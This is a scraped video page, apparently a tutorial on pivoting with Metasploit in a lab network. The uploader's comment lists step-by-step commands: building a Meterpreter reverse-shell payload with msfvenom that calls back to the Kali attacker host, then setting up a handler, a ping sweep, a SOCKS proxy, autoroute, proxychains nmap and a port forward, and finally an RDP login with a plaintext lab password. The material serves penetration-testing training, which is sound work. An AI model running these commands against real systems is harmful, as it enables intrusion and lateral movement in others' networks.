Pivoting with Meterpreter 101

Views: 196

Into the Code with Danny

5 months ago

commands in description
please subscribe we are almost at 1,000 :)

Comments: 2
@user-mn6lm1lt7e 19 days ago
Thanks for sharing this! useful for my eCCPT
@intothecodewithdanny5389 5 months ago
Kali Attack Box 192.168.56.7
Ubuntu 192.168.56.19 10.0.3.5
Windows Server 12 10.0.3.4

From Kali Box
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.56.7 -f elf -o job LPORT=8080
chmod +x job
ssh ubuntu@192.168.56.19
ifconfig

---------------on Kali open another terminal and start up a multi handler
msfconsole
use exploit/multi/handler
set lhost 0.0.0.0
set lport 8080
set payload linux/x64/meterpreter/reverse_tcp
run

--------------Copy the Payload to Ubuntu (ensure you are running this from the folder with the payload on your kali box)
--------------------------------From Kali box run this
scp job ubuntu@192.168.56.19:~/
-----------------------------------------------------
From ubuntu ssh session run this
chmod +x job

==============================From Kali box meterpreter session
check the interfaces
run a ping sweep of the path you want to pivot to to enumerate systems on it
run post/multi/gather/ping_sweep RHOSTS=10.0.3.0/24
we found 10.0.3.4 is a host on the network (target acquired)
wait for the traps to show/errors and such
show map to classroom
background the session in meterpreter - example how we are going to use the ubuntu box as a proxy in a way

next we will set up a socks proxy using msfconsole
use auxiliary/server/socks_proxy
set SRVPORT 9050
set SRVHOST 0.0.0.0
set version 4a
run
background (note it will already be running in the background)
check your jobs

================change your /etc/proxychains/config
sudo nano /etc/proxychains4.conf

(optional)
####set up post/multi/manage/autoroute
####set SESSION 1
####set SUBNET 10.0.3.0/24
####run
####background
####(note you could also run routes using "run autoroute -s 10.0.3.0/24" in the meterpreter session)

----------check your autoroutes in meterpreter
sessions -i (use the session)
sessions -i 1
run autoroute -p
run autoroute -s 10.0.3.0/24
run autoroute -p

=======use proxy chains to route nmap traffic
proxychains nmap 10.0.3.4 -p3389 -sT -v -Pn

================explain the Windows Server to class
open a new terminal and run this from kali
proxychains nmap 10.0.3.4 -p3389 -sT -v -Pn
noticed that windows has port 3389 open

================From Meterpreter add a port forward
only traffic that is sent to local host 3300 is sent to 3389
portfwd add -l 3300 -p 3389 -r 10.0.3.4

===========now send an xfreerdp session to the Windows Host
=======our meterpreter session is doing all the routing in combination with proxy chains
=======we can enter the command below from the Kali box to get RDP on Windows
=======================================================
(didn't work for me) xfreerdp /v:localhost:3300 /u:administrator /p:Passw0rd
(worked) rdesktop -u administrator -p Passw0rd localhost:3300